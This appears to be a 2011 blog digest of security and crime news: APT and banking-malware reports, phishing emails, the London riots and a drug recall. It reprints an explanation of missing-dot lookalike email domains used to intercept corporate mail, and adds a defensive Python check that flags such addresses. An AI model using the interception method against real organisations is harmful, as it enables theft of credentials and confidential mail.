HAS YOUR COMPANY BEEN INFILTRATED BY THE SHADY RAT HACK ?

Full article : http://cwonline.computerworld.com/t/7477178/930454165/524124/0/


When McAfee released its Operation Shady Rat hacking report in early August, it didn't name all of the organizations it thought could have been hacked as part of a large, five-year ongoing campaign. Yours might be one of them.

McAfee said 72 organizations worldwide were hacked (49 in the USA and 2 in the UK), according to log reports in a server that McAfee gained access to. It listed a few, such as the U.N., the U.S. International Trade Organization and the World Anti-Doping Agency, but most were unnamed.

The company's report generated wide media coverage and a breathless recount of the continued threat that sophisticated hackers pose. China even responded, saying in its official People's Daily newspaper on Friday that linking every cyberattack to the country is "irresponsible."

MOBILE MALWARE REALITY CHECK

Full article : http://cwonline.computerworld.com/t/7469775/930454165/523472/0/


Malicious software is leaping from PCs to cell phones, as malware makers target the platform in hopes of making a quick buck. An infected app released into the Android Market can infect several thousand users' phones before anyone discovers the presence of the malware. Examples include the infected DroidDream and Plankton Android apps.

Though the extent of Android malware has been overstated, it's best to learn now how to protect yourself and your data from attacks, instead of waiting until mobile malware becomes a more serious problem.

 

SPYEYE TROJAN DEFEATING ONLINE BANKING DEFENCES

Full article : http://cwonline.computerworld.com/t/7460942/930454165/522984/0/

Banks are facing more trouble from SpyEye, a piece of malicious software that steals money from people's online bank accounts, according to new research from security vendor Trusteer.

SpyEye is a particularly nasty piece of malicious software: it can harvest credentials for online accounts and also initiate transactions as a person is logged into their account, literally making it possible to watch their bank balance drop by the second.

In its latest versions, SpyEye has been modified with new code designed to evade advanced systems banks have put in place to try and block fraudulent transactions.

 

ITALY'S CYBERCRIME POLICE HACKED

Full article : http://cwonline.computerworld.com/t/7457906/930454165/522792/0/

Italy's specialist police unit responsible for combating cybercrime suffered an embarrassing hack Monday by members of the loosely knit Anonymous hacktivist galaxy.

In a communique posted on Twitter, the hacker group claimed to have obtained more than 8GB of internal data from what it called the "Homeland Security Cyber Operation Unit in Europe" and said it would publish all the material it had obtained from its Italian branch.

The group said it had "owned" the server of the National Center for Computer Crime and the Protection of Critical Infrastructure (CNAIPIC) of the Italian police and would be publishing the material via the LulzSec and Anonymous communities under its #AntiSec campaign.

ROMANIAN AUTHORITIES TARGET INTERNET FRAUD SCHEME

Full article : http://cwonline.computerworld.com/t/7438326/930454165/521480/0


Romanian law enforcement officials on Thursday executed 117 searches targeting more than 100 people in an ongoing effort with the U.S. Department of Justice to break up a large Internet auction fraud scheme, the DOJ said.

The coordinated effort between Romanian and U.S. law enforcement agencies has resulted in the arrest of more than 100 people in Romania and the U.S. since 2010, the DOJ said Friday.

In many of the cases, conspirators located in Romania would post items for sale, including cars, motorcycles and boats, on Internet auction and other websites, the DOJ said in a press release. They would tell interested buyers in the U.S. to send money by wire transfer to fictitious names that they claimed to be employees of an escrow company.

The victims would not receive the items they paid for. Victims have lost more than US $10 million to the scheme, the DOJ said.


DDOS ATTACK IN MARCH LIKELY NORTH KOREAN WORK

Full article : http://cwonline.computerworld.com/t/7421068/930454166/519802/0/

The cyber attacks that paralyzed a handful of major South Korean websites earlier this year were almost certainly carried out by North Korea or parties allied with the country, computer security company McAfee said Tuesday in a report.

The company's analysis, carried out with the help of the South Korean and U.S. governments, is one of the most thorough yet published on the March attacks, and details how they were carried out, and why they were so difficult to counter.

In investigating the incident, the report draws clear parallels with a similar attack that knocked South Korean and U.S. websites offline in 2009 and comes to an unsettling conclusion: the attacks were likely designed to test South Korea's cyber defense and response, and could be the prelude of a much larger attack in the future.

HOW SECURE IS YOUR MOBILE DEVICE REALLY ?

Full article : http://cwonline.computerworld.com/t/7421068/930454166/519808/0/

With all the reports of mobile malware, vulnerabilities and attacks, things must seem pretty confusing to the consumer. Is the sky really falling? Let's explore some of the practical aspects of mobile security a bit from the consumer's point of view.

First off, it's always important to put these reports into perspective. Over the past few months, we've heard of malware in Google's Android Market, weaknesses in Apple's iOS and all sorts of other badness. Many, though not all, of these reports were released by folks who want to sell you a security add-on or service. That's not to say the reports were false, but their severity should always be taken with a grain of salt.

 

HOW TO LIVE WITH MALWARE INFECTIONS

Full article : http://cwonline.computerworld.com/t/7418567/930454165/519676/0/

How can you be sure your organization doesn't have insidious viruses or other malware lurking within systems and applications, waiting to inflict damage? You can't.

Malware has grown sophisticated to the point where there's no guarantee that it's actually gone, even when you've applied the latest antivirus software. Making matters worse, IT infrastructures are becoming much more complex -- with an ever-growing population of devices that give malware even more possible entry points.

Executives are big, fat, juicy targets for spearphishing attacks. Learn how to protect them from being harpooned. Find out how to block the viruses, worms, and other malware that threaten your business.

The advice in the article is obviously meant for business, but it is also useful for the domestic user.

SPEAR PHISHERS SHARPEN SKILLS, CRAFT "INCREDIBLE" ATTACKS, SAY EXPERTS

Full article : http://cwonline.computerworld.com/t/7385360/930454165/516673/0/


Recent break-ins at high-profile targets like the International Monetary Fund (IMF) demonstrate just how proficient hackers have become at "spear phishing," researchers said today.

"Today's spear phishing is not only more prevalent but also much more technically proficient," said Dave Jevans, chairman of the Anti-Phishing Working Group (APWG), an industry association dedicated to fighting online identity theft. "They're not going for a password, anymore, they're getting people to install crimeware on their computers," said Jevans.

Like the more common phishing, spear phishing attacks are launched as emails that try to con the recipient into clicking a link that leads to a malicious Web site. Those sites can take almost infinite forms, from fake account log-in screens to ones that tout a software upgrade to widely-used software, such as Adobe Flash.

MOBILE APP SECURITY : 5 WAYS TO PROTECT YOUR SMARTPHONE

Full article : http://cwonline.computerworld.com/t/7376119/930454166/515544/0/

Wave your smartphone; buy a latte. Sounds great, doesn't it? But before running off to participate in Silicon Valley's next new thing, you might want to think about a scary downside to mobile commerce: the vulnerability of smartphones to hackers.

A new report by McAfee, a vendor of anti-virus software, says that better security around networks has prompted hackers to seek new targets, and the mobile app store is one of the most tempting. Because the market for Android apps is less controlled than Apple's iTunes store, security researchers have seen a rash of attacks against that platform this year. With the exception of phones using the long-established Symbian platform, Android devices were the most likely to be targeted during the first three months of this year, according to the report.


(19th September 2011)


 

BAD SPELLING OPENS UP SECURITY LOOPHOLE
(BBC News - Technology, dated 12th September 2011)
www.bbc.co.uk

A missing dot in an email address might mean messages end up in the hands of cyber thieves, researchers have found.

By creating web domains that contained commonly mistyped names, the investigators received emails that would otherwise not be delivered.

Over six months they grabbed 20GB of data made up of 120,000 wrongly sent messages.

Some of the intercepted correspondence contained user names, passwords, and details of corporate networks.

About 30% of the top 500 companies in the US were vulnerable to this security shortcoming according to researchers Peter Kim and Garret Gee of the Godai Group.

The problem arises because of the way organisations set up their email systems. While most have a single domain for their website, many use sub-domains for individual business units, regional offices or foreign subsidiaries.

Dots or full stops are used to separate the words in that sub-domain.

For example a large American financial group may take bank.com as its corporate home but internally use us.bank.com for staff email.

Usually, if an address is typed with one of the dots missing, ie usbank.com, then the message is returned to its sender.

But by setting up similar doppelganger domains, the researchers were able to receive messages that would otherwise be bounced back.

"Doppelganger domains have a potent impact via email as attackers could gather information such as trade secrets, user names and passwords, and other employee information," wrote the researchers in a paper detailing their work.

Only one of the companies being impersonated noticed that spoofing was taking place and tracked down the researchers.

Man in the middle
 
A clever attacker could cover their tracks by passing on the message to its correct recipient and relaying back any reply.

By acting as a middleman the likelihood of more messages being mis-sent using the "reply" function increases.

Follow-up work by the researchers revealed that some cyber criminals may already be exploiting keyboard errors.

A search uncovered many addresses resembling corporate sub-domains which were owned by individuals in China or linked to sites associated with malware or phishing.

Writing on the blog of security firm Sophos, Mark Stockley said: "It's striking that the researchers managed to capture so much information by focusing on just one common mistake.

"A determined attacker with a modest budget could easily afford to buy domains covering a vast range of organisations and typos," he said.

(12th September 2011)
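An outbound-mail check for the missing-dot mistake described in the article above, as an added example that is not the researchers' code. The organisation name corp.example, its sub-domains, the recipient list and the function names are all constructed for illustration; they mirror the article's us.bank.com / usbank.com case.

```python
def build_lookalikes(subdomains, registered_domain, known_good=()):
    """Return {lookalike registrable domain: internal domain it imitates}.

    Dropping the dot that joins a sub-domain to the registered domain
    ("us.corp.example" -> "uscorp.example") produces a name under a
    different registrable domain, which somebody else may own.
    `known_good` lists such names that are genuine correspondents.
    """
    registered = registered_domain.lower().strip(".")
    suffix = "." + registered
    skip = {d.lower().strip(".") for d in known_good}
    lookalikes = {}
    for fqdn in subdomains:
        fqdn = fqdn.lower().strip(".")
        if not fqdn.endswith(suffix):
            continue                    # not one of our sub-domains
        # Label sitting directly in front of the registered domain,
        # e.g. "apac" for "mail.apac.corp.example".
        label = fqdn[: -len(suffix)].rsplit(".", 1)[-1]
        if not label:
            continue
        candidate = label + registered
        if candidate not in skip:
            lookalikes[candidate] = label + suffix
    return lookalikes


def screen_recipients(addresses, lookalikes):
    """Return [(address as typed, suggested correction)] for risky mail."""
    findings = []
    for address in addresses:
        typed = address.strip()
        local, at, domain = typed.rpartition("@")
        if not at or not local:
            continue                    # not an email address
        domain = domain.lower().strip(".")
        for fake, intended in lookalikes.items():
            if domain == fake or domain.endswith("." + fake):
                # Keep any host part in front, swap in the dotted form.
                fixed = domain[: len(domain) - len(fake)] + intended
                findings.append((typed, local + "@" + fixed))
                break
    return findings


# Constructed sample data.
INTERNAL_SUBDOMAINS = [
    "us.corp.example",
    "uk.corp.example",
    "mail.apac.corp.example",
]
OUTBOUND_RECIPIENTS = [
    "alice@us.corp.example",            # correct
    "bob@uscorp.example",               # dot missing
    "carol@mail.apaccorp.example",      # dot missing in a deeper name
    "dave@partner.example",             # unrelated external domain
    "Erin@UKcorp.example",              # dot missing, mixed case
    "not-an-address",
]

if __name__ == "__main__":
    table = build_lookalikes(INTERNAL_SUBDOMAINS, "corp.example")
    for typed, suggestion in screen_recipients(OUTBOUND_RECIPIENTS, table):
        print("hold: %s (did you mean %s?)" % (typed, suggestion))
```

The keys of the lookalike table are also the names an organisation would consider registering itself or watching for new registrations.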



.XXX WEB DOMAIN REGISTRATION BEGINS
(BBC News, dated 7th September 2011)
www.bbc.co.uk

 

Companies and celebrities are being given the chance to protect their names from porn hijacking ahead of the launch of the .xxx web domain.

From today, brands can request to have their name blocked from use with the new suffix, which goes live next year.

Existing adult entertainment sites can also submit their application to reserve a spot on .xxx

The "red light" suffix is intended to make it easier to find or avoid sexually explicit material online.

ICM Registry, which is administering the launch, said it hoped to "promote a responsible approach to adult content".

Brand and IP holders wanting to register now have 50 days - a so-called "sunrise period" - to submit their application.

Companies and individuals that do not want their name associated with pornography will be able to pay a one-off fee of between $150 and $300 (£100 to £200), depending on which company they register their domain with.

For example, UK adult star Teresa May might wish to bid for a .xxx domain, whereas UK home secretary Theresa May might consider protecting her name.

Conflicts over exact matching names will go through an arbitration process.

"Win, win, win"

Companies are under no obligation to go .xxx, according to ICM Registry's chief executive Stuart Lawley.

But those that did would contribute to an overall "win, win, win" situation, with benefits for adult content providers, web users in search of pornography, and those wishing to avoid it.

"Regardless of what your personal views are on the existence of pornography on the internet, at least .xxx will give people the information they need to make a choice," said Mr Lawley.

However, Jerry Barnet, chairman of the Adult Industry Trade Association, warned that anti-pornography activists would likely increase their efforts to block online adult content.

"I have mixed feelings about it," he told BBC News. "From the industry and freedom of speech point of view, I'm concerned that pro-censorship and morality campaigners will use this as an excuse to try and introduce some form of censorship.

"But from a business point of view it's kind of good for us because there are new names available, and that makes branding and site naming more interesting," he added.

Malware issues
 
ICM Registry does not process the applications directly. Firms must first approach a standard domain registrar in their home country, such as Go Daddy or Enom.

To ensure the registered porn sites do not harbour malware or present any other cyber security-related threats, ICM said they will be scanned daily by security firm McAfee - something that would make them safer to visit than many non-xxx sites.

The websites will be overseen by the International Foundation for Online Responsibility, and will be fitted with an electronic label to allow parents to adjust their browser settings and make sure children do not have access to certain sites.

After the sunrise period is over, a "land rush" period will run for 17 days, allowing prospective adult sites to register for the remaining .xxx addresses.

Following that, anyone else will be able to submit an application for non-reserved names on a first come, first served basis.

(8th September 2011)


 

CHARITABLE PUBLIC MISLED BY COMMERCIAL COLLECTION COMPANIES
(British Heart Foundation, dated 31st August 2011)
www.bhf.org.uk

New research by our shops shows that as little as a third (30%) of items donated to charity via letterbox charity bags stand a chance of ending up in charity shops - much to the surprise of UK householders.

Our shops alone have seen a 36% drop in household collections meaning a loss of £4.6 million over the last two years.

Our research reveals that over two thirds of charity bags an average householder receives are from commercial companies working with charities by selling the donated items overseas for profit.

Worryingly, over six out of ten people (65%) aren't aware these commercial companies exist and think 100% of the profits made from their charity bag donations go to the charity involved. The reality is that in some cases as little as 5% is paid to a charity who is working with a commercial company. 85% of people who are now aware of this activity say it makes them feel shocked, cheated and disheartened.

BHF Shops are releasing these findings in advance of their BIG Donation stock appeal this September because they think it's vital people understand where their charity bag donations are going so they can make an informed choice when choosing which charity to support.

As well as causing confusion, the escalation in commercial activity has had a negative impact on charity bag donations. Our Shops alone have seen a 36% drop in household collections meaning a loss of £4.6 million over the last two years (2009-2011).

Retail Director, Mike Lucas, says: "It is vital commercial companies act responsibly and be transparent on their charity bags - particularly around how much profit the named charity will actually make from a collection.

"Householders have the right to know what happens to their donations and currently this information is not clear. Although this is a legal way to raise money, companies working for commercial gain are a huge problem for charities with high street shops. BHF Shops do not work with these companies and because of this 100% of the profits made from charity bag donations stay with us - helping us continue our lifesaving work".

Advice to householders

Take your donations directly into your local BHF Shop this September and support our biggest stock appeal - The Big Donation. Aiming to bring in over 600,000 bags of stock throughout the month, everyone can help by donating good quality clothing, shoes, accessories, CDs, DVDs, books, toys and bric-a-brac to their local BHF Shop.

- Check charity bags and leaflets for information about how much of the proceeds from your items go to the charity.
- Our shops carry out doorstep collections using clearly identified vans and drivers. Ask the collector for identification if you're not sure.
- The BHF also offers a free collection service for those larger items.

British Heart Foundation website : www.bhf.org.uk

(1st September 2011)



DVD ISSUED TO SCHOOLS TO TACKLE SERIOUS ORGANISED CRIME
(Lothian and Borders Police, dated 25th August 2011)
www.lbp.police.uk

Lothian and Borders Police is taking the fight against serious organised crime to secondary schools throughout the area.

 

A hard-hitting DVD is being launched outlining what serious organised crime is, how it can impact on teenagers and their local community, and how easy it is to make a bad decision and become involved in it.

All secondary school children in the force area from S2 and above will be shown the five-segment film 'Slide'. It depicts one youngster's descent into a life of crime and drug addiction after he becomes involved with serious organised crime.

The DVD was commissioned after the Serious Organised Crime Taskforce published their "Letting Our Communities Flourish" document - a campaign to reduce the impact of serious organised crime across Scotland.

In order to involve the community in this project, Lothian and Borders Police worked with Greenbanana Films, based in Dalkeith, to develop the DVD. An additional training package has also been developed for adults who work with children in youth clubs and voluntary organisations.

The launch comes amid Lothian and Borders Police's ongoing 'Made From Crime' campaign, designed to target those who have been drawn into a life of crime and are living lavish lifestyles on the illegal proceeds.

Chief Superintendent Malcolm Graham believes the DVD is an important reminder that the consequences of a life of crime will far outweigh any perceived benefits.

Chief Superintendent Graham said: "Organised crime group leaders like to avoid police attention by coercing others into doing their dirty work for them.

"Many young people may be seduced by the notion that crime brings with it perks such as designer clothes, fast cars and big houses but this DVD quickly dispels that myth.

"Campaigns like our 'Made From Crime' initiative and 'Slide' DVD reinforce this is not the case, and that Lothian and Borders Police will robustly target anyone believed to be involved in this type of criminality.

"The reality is that if you become involved in serious organised crime you face frequent and lengthy jail terms and a very poor quality of life.

"Lothian and Borders Police are committed to tackling the crime groups that blight our community.

"We will continue to work closely with our partner agencies to prevent crime groups accessing and influencing the young and more vulnerable members of our communities."

Councillor Marilyne MacLaren, Education Leader, said: "There is nothing glamorous about a life of crime and I am sure this hard-hitting DVD will drive home to our young people the message that it will bring nothing but misery to both themselves and their families.

"Criminals are being sent to prison every day of the week so it is important teenagers fully realise the dangers they could place themselves in by going down this treacherous path."

(30th August 2011)


 

DATA PROTECTION

Before I go into a little more detail on this subject I thought I would include a jovial letter that has been "doing the e-mail rounds" (okay spam). The letter is full of sarcasm, but I think that it gets to the point of ineffectual data protection rules quite well.

---------------
Dear Minister,

I'm in the process of renewing my passport but I am at a total loss to understand or believe the hoops I am being asked to jump through.

How is it that Bert Smith of T.V. Rentals Basingstoke has my address and telephone number and knows that I bought a satellite dish from them back in 1994, and yet, the Government is still asking me where I was born and on what date?

How come that the chappy who comes round every Thursday night with his DVD rentals van can tell me every film or video I have had out since he started his business up eleven years ago, yet you still want me to remind you of my last three jobs, two of which were with contractors working for the government?

How come the T.V. detector van can tell if my T.V. is on, what channel I am watching and whether I have paid my licence or not, and yet if I win the government run lottery they have no idea I have won or where I am and will keep the bloody money to themselves if I fail to claim in good time. Do you people do this by hand?

You have my birth date on numerous files you hold on me, including the one with all the income tax forms I've filed for the past 30-odd years. It's on my health insurance card, my driver's licence, on the last four passports I've had, on all those stupid customs declaration forms I've had to fill out before being allowed off the planes and boats over the last 30 years, and all those insufferable census forms that are done every ten years and the electoral registration forms I have to complete, by law, every time our lords and masters are up for re-election.

Would somebody please take note, once and for all, I was born in Maidenhead on the 4th of March 1957, my mother's name is Mary, her maiden name was Reynolds, my father's name is Robert, and I'd be absolutely astounded if that ever changed between now and the day I die!

I apologise Minister. I'm obviously not myself this morning. But between you and me, I have simply had enough!

You mail the application to my house, then you ask me for my address. What is going on? Do you have a gang of Neanderthals working there? Look at my damn picture. Do I look like Bin Laden? I don't want to activate the Fifth Reich for God's sake! I just want to go and park my weary backside on a sunny, sandy beach for a couple of weeks' well-earned rest away from all this crap.

Well, I have to go now, because I have to go back to Salisbury and get another copy of my birth certificate because you lost the last one. AND to the tune of 60 quid! What a racket THAT is!! Would it be so complicated to have all the services in the same spot to assist in the issuance of a new passport the same day? But nooooo, that'd be too damn easy and maybe make sense. You'd rather have us running all over the place like chickens with our heads cut off, then find some ##### to confirm that it's really me on the goddamn picture - you know... the one where we're not allowed to smile in case we look as if we are enjoying the process!

Hey, you know why we can't smile? 'Cause we're totally jacked off!


I served in the armed forces for more than 25 years including over ten years at the Ministry of Defence in London. I have had security clearances which allowed me to sit in the Cabinet Office, five seats away from the Prime Minister while he was being briefed on the first Gulf War and I have been doing volunteer work for the British Red Cross ever since I left the Services. However, I have to get someone 'important' to verify who I am -- you know, someone like my doctor... who got his medical degree only 6 months ago !

Yours sincerely,

An Irate British Citizen

-------------------------------

Government Surveys

The point of including the previous e-mail was to highlight that Government departments do have a plethora of information about each UK citizen, but none of this information is formally linked together. Why ? Put simply, it is the UK data protection laws and their application. Things are so bad that the government needs to carry out anonymous respondent surveys to see how much benefit claimants are getting in total. They are not allowed to trawl their own systems to determine what an individual is getting.

One of the main organisations used to obtain this information is the Office for National Statistics (ONS), a Government agency. The ONS computer system will choose a "random" list of addresses in the UK (several thousand). An introductory letter will be sent to the occupier at those addresses. No names are used as the "system" doesn't know who lives at those addresses. The incentive for the recipient to take part in this exercise was (and may well still be) a book of first class stamps! For this reward the voluntary respondent will be able to air their views on the current topic being surveyed after they have answered up to 2 hours worth of questions. Not only will the visiting questioner ask questions, they will also ask to see paper evidence of such things as pension payments, tax credits, child benefit and Jobseekers allowance etc. Things get worse if the respondent is in rented accommodation as local council payments are then involved and evidence of those payments will also be sought.

The central Government has no idea of how much each individual benefit claimant is being paid.

For some reason the current Government is not happy with the concept of identity cards. Perhaps they were all former viewers of the cult TV programme "The Prisoner" and its catchphrase "I am not a number, I am a free man"! Or was it "Big Brother" of the novel 1984 ! The thing is, we are all referred to by reference numbers already and have been for years, for example :

- Driving licence number
- National Insurance number
- National Health Service medical number
- Passport number

These all use individual reference numbers or accounts, but the databases on which they sit are not cross referenced.

In the current Global economy where data can be stored anywhere in the world can you imagine what problems could occur if these computer systems were administered by companies operating in countries that did not have data protection laws ? The problem is, some of them do !

For now all we can do is just sit and read about each incident as it occurs.


 

BENEFIT FRAUD COSTS TOWN HALLS £20 MILLION
(Evening Standard, dated 26th August 2011 author Peter Dominiczak)
www.thisislondon.co.uk [Note 1]

Town halls across the capital paid out more than £20 million of taxpayers' money to benefit fraudsters last year, the Standard can reveal.

Exclusive figures obtained by this newspaper show that councils are handing out millions every year to people making false housing and council tax claims.

Five councils in the capital had at least £1 million illegally claimed over the course of 12 months, according to statistics released by the Audit Commission.

Brent, Haringey, Lambeth and Ealing had the highest levels of illegal benefit claims, with Brent paying out £1.33 million to just 154 claimants.

The figures show that Barnet council paid out £4.6 million in 2009/10, though officials say only £1.1 million of this was fraudulently claimed and the rest was overpaid for other reasons.

Communities Secretary Eric Pickles announced a 10-point plan to tackle council fraud across England and recover £2 billion a year earlier this year. He said: "It's time to get tough and take on the fraud cons. "Better prevention, detection and recovery of fraud will help reduce the financial pressure on councils and help protect front line services." He added: "Councils should carry out better credit checks through credit rating agencies before giving over discounts or benefits."

Campaigners said today that the figures are evidence that Britain's benefits system is in need of urgent reform.

Robert Oxley, from the TaxPayers' Alliance, said: "Hard-working taxpayers will be angry their cash is ending up in the pockets of benefit cheats because London councils aren't able to ensure tens of millions of pounds doesn't end up in the hands of layabouts."

He added: "The welfare system is there to help the most vulnerable, this fraud is yet more evidence it is broken and in serious need of reform."

A London Councils spokesman said: "Councils face a significant challenge in combating benefit fraud. While all reasonable efforts are made to fully assess claims, councils do not have the resources required to investigate fully every single claimant so to some extent have to rely on the general public."

Meanwhile, Barnet council leader Richard Cornelius said: "Barnet takes benefit fraud extremely seriously, and takes legal action to see that public money is recovered and offenders prosecuted."

Authorities with the smallest amounts of money defrauded were City of London Corporation, Richmond, Merton, Barking and Hammersmith.

£1.5 million property empire financed by false claims

A family of four who built up a London property empire worth £1.5 million through fraudulent claims were jailed this year after a four-year investigation by Barnet council and other bodies.

The evidence revealed how money claimed illegally was then used to finance mortgage repayments on a number of properties across London. Three of the houses were in Barnet, one in Ealing and one in Waltham Forest.

The case hit the headlines after the judge dismissed the jury at the trial amid claims of "nobbling" and returned her own verdict.

Riccardo Guthrie, 33, was jailed for three years. Bianca Guthrie, 37, and Cosima Guthrie, 25, were jailed for two years and 18 months respectively. A fourth defendant, Courtney Campbell, 48, their accomplice, was given a year's suspended jail sentence and ordered to complete 160 hours of unpaid community work.


 

(29th August 2011)


 

POST RIOT - SOURCES OF INFORMATION

To provide information :

Metropolitan Police video images of suspects : www.met.police.uk/disordersuspects/
Metropolitan Police Major Investigation Team : 020 8345 4142
Crimestoppers ( Nationwide crime anonymous reporting ) : 0800 555 111

On where to receive help :

Communities and Local Government : http://www.communities.gov.uk/corporate/riotsupport/
Government Information website : www.direct.gov.uk/riotadvice

(27th August 2011)


 

RIOT BY NUMBERS

NATIONWIDE THERE HAVE BEEN 5 DEATHS.

237 Metropolitan Police officers were injured, having experienced unprecedented violence directed at them during the disorder.

The violence ripped through 22 of the 32 London boroughs.
The London Fire Brigade received over 1,700 calls for their help to deal with fires.


The latest Met Police information on arrests and charges:

- 1985 total arrests (adult: 1564 / juveniles: 421)
- 1138 people have been charged (adult: 895 / juveniles: 243)
- There were 3296 Notifiable offences, broken down into the following categories :

Arson 162
Assault with Injury 80
Burglary in a Dwelling 48
Burglary in Other Buildings 1101
Robbery of Business Property 102
Common Assault 32
Criminal Damage To a Dwelling 70
Criminal Damage To M/V 399
Criminal Damage To Other Bldg 280
Drug Trafficking 4
Going Equipped 8
Handling Stolen Goods 95
Harassment 43
M/V Interference & Tampering 4
Murder 2
Offensive Weapon 39
Other Criminal Damage 90
Other Fraud & Forgery 1
Other Notifiable 110
Other Theft 45
Other Violence 49
Robbery of Personal Property 310
Picking Pockets, etc 3
Possession Of Drugs 58
Serious Wounding 48
Snatches 36
Theft From M/V 42
Theft From Shops 17
Theft/Taking of M/V 10
Theft/Taking of Pedal Cycles 8

(27th August 2011)


 

LONDON RIOT ARRESTS REACH 2,000
(BBC News, dated 25th August 2011)
www.bbc.co.uk

The Metropolitan Police said it has now arrested more than 2,000 people in connection with rioting and looting across London earlier this month.

Scotland Yard said that 2,006 people had been arrested and of those 1,135 had been charged.

Separate figures from the Ministry of Justice show that, across England, almost 1,500 people have appeared in court to answer riot-related charges.

Some 70% of alleged offenders have been remanded in custody.

Scotland Yard said 954 of those charged over London's disturbances had already appeared before the court, 82 had been sentenced and 42 jailed.

The force has also launched an online gallery of some of those offenders, detailing their crimes and sentences.

Commander Simon Foy said: "We have made these pictures available so that communities across London can see that those who took part in the appalling scenes which shocked us all have been brought to justice. "I want to send a clear message to those involved that you will not get away with it.

"The determination and dedication of officers from all parts of the Met have led to this important milestone, but we are far from finished. The investigation into the widespread criminality we saw remains a major task on an unprecedented scale.

"We have got to this point with fantastic support from the public and I urge anyone with any information to come forward."

Of the 1,500 offenders who have appeared in courts nationwide, more than 160 have already been sentenced and half of them jailed.

One in 10 of the 300 juveniles who have appeared in court have received custodial sentences. Nine out of 10 of the offenders currently being dealt with were male.

On Thursday, five men were jailed at Wood Green Crown Court for looting Zee & Co clothing store in Bethnal Green, East London.

About £100,000 damage was caused to the store and £646,524 goods taken on 8th and 9th August.

(27th August 2011)


 

ALERT OVER NUROFEN PLUS DRUG MIX-UP
(BBC News, dated 25th August 2011)
www.bbc.co.uk

Consumers are being warned to check packs of Nurofen Plus after it emerged that thousands could mistakenly contain antipsychotic drugs.

The Medicines and Healthcare products Regulatory Agency (MHRA) has issued a safety alert following reports that some batches contained Seroquel XL 50mg instead of Nurofen Plus.

The affected 32-tablet packs are in batches numbered 13JJ, 57JJ and 49JJ.

People with affected packets should return them to their pharmacy.
The mix-up is still under investigation, and packs from the three batches have been found across the UK.

Seroquel XL is a prescription-only anti-psychotic drug used to treat several disorders including schizophrenia, mania and bipolar depression.

Nurofen Plus is for pain relief and contains codeine and ibuprofen.

Each of the affected batches contains between 4,000 and 7,500 packs - around half a million in total. But not all the packs are affected.

'Serious investigations'
 
The Seroquel tablets are larger and have gold and black packaging, compared with the Nurofen Plus tablets which are smaller and have silver and black packaging.

Nurofen Plus is stocked behind the counter in chemists, so people cannot simply pick it up.

Ian Holloway, from the MHRA's defective medicines report centre (DMRC), said: "People should check to see if they have any affected packets of Nurofen Plus. "If you do, return them to the pharmacy where you bought them from. "You can also report this to the MHRA's DMRC on 020 3080 6574." He added: "If you have taken a tablet and you have any questions, speak to your GP."

There have been three reports of affected packs. Two people are believed to have taken Seroquel by mistake, but are not thought to have experienced any ill-effects.

In a statement, Reckitt Benckiser, which makes Nurofen Plus, said the three cases so far identified had all been in South London.

And it said "serious investigations" were under way to establish how the mix-up occurred, especially as Seroquel XL is manufactured by another drug firm, AstraZeneca.

It added: "After careful review of the manufacturing system, manufacturing errors by the makers of Nurofen Plus or Seroquel XL are not thought to be part of the cause at this stage."

Dr Aomesh Bhatt, medical director for Nurofen Plus, said: "We are taking this matter extremely seriously and we are working closely with the MHRA to investigate fully.

"Additionally, we are in the process of working to ensure the Nurofen Plus packs are double-checked by pharmacy staff before they are handed to customers.

"We encourage consumers of Nurofen Plus to be vigilant and, while it is very unlikely, should they find they have a suspect pack or if they have any other concerns, we advise them to speak to the pharmacist where they purchased the product."

AFFECTED PACKS

Batch 13JJ - Expiry date - 03/2014. Product licence no - 00327 / 0082. First distributed - 30th April 2011
Batch 57JJ - Expiry date - 05/2014. Product licence no - 00063 / 0376. First distributed - 21st June 2011
Batch 49JJ - Expiry date - 05/2014. Product licence no - 00063 / 0376. First distributed - 1st July 2011


(25th August 2011)



MORE NEWS FROM MY SPAM INBOX ! - AUGUST 2011
Category : phishing

 

My Internet Service Provider's (ISP) spam filter has continued to do a very good job. In the last 4 weeks it has managed to filter out 10 phishing e-mails and place them in a "be warned" post box.

The latest batch of phishing e-mails include :

HALIFAX BANK - Nine e-mails have been received with 8 variations of the originator's name: "Halifax Secure", "Halifax Online", "Halifax Online-services", "Halifax - Onlineservices", "Halifax Bank Plc", "Halifax Bank plc", "Halifax" and "Internet Banking" (Title: Message from Halifax Bank). The following are examples of the attached messages :

- Click on attachment to view message (5)
- Your Halifax Online Banking  Account  temporarily Block or Restricted! Click on link.
- You have a message from the bank. Click on link and enter account and password to view message.
- The bank is upgrading its security on your account (new technology etc). Click here to upgrade your account security.

LLOYDS TSB - e-mail stating that I can upgrade my internet banking service. Click on link and enter personal details.

All of these e-mails are bogus and are just phishing for personal information. If you receive them, delete them immediately and do not CLICK on any link or open any attachments. If you are suspicious about activity on your bank account, contact your bank directly using a known telephone number. DO NOT use the contact details within these bogus e-mails.

(20th August 2011)


 

SUZY LAMPLUGH'S MOTHER DIANA DIES AFTER HAVING A STROKE
(BBC News, dated 19th August 2011)

The mother of murdered estate agent Suzy Lamplugh has died.

Personal safety campaigner Diana Lamplugh, 75, died in her sleep in a London hospital after suffering a stroke.

She set up the Suzy Lamplugh Trust after her 25-year-old daughter disappeared in 1986, having left her west London offices to meet a client.

Mrs Lamplugh campaigned on issues ranging from making minicabs safer to protecting victims of stalking.

Paul Infield, chairman of the Suzy Lamplugh Trust's board of trustees, said: "Diana was one of those people who contributed energy, focus and commitment to everything she did.

Battle with Alzheimer's
 
"With her husband Paul, she was tireless in establishing, through the trust, the concept of and discipline for personal safety - now a household expression - as a positive life skill for people of all ages and occupations."

Mrs Lamplugh, who was appointed an OBE in 1992, first suffered a stroke in 2003 and then had a nine-year battle with Alzheimer's.

She leaves her husband Paul, her other children Richard, Tamsin and Lizzie, and her seven grandchildren.

Her daughter Suzy's remains have never been found but she was declared dead, presumed murdered, in 1994. Officers have examined thousands of lines of inquiry and conducted DNA testing on 800 unidentified bodies.

Suzy Lamplugh Trust website: www.suzylamplugh.org/

(19th August 2011)



NEW REFERRAL UNIT TO KEEP INTERNET SAFE FROM TERRORISTS
(Dyfed-Powys Police, dated 17th August 2011)
www.dyfed-powys.police.uk

 

The internet can be used to promote terrorism and violent extremism and corrupt those individuals who are vulnerable to radicalisation. Recent cases such as those of Isa Ibrahim and Nicky Reilly, who were convicted of terrorist offences after being radicalised on the internet, show the influence it can have on people.

The ACPO Counter Terrorism Internet Referral Unit (CTIRU) was set up a year ago to make the internet a more hostile place for terrorists.

The CTIRU aims to remove unlawful terrorist material content from the internet with a focus on UK based material. It also works with international partners to remove material hosted abroad.

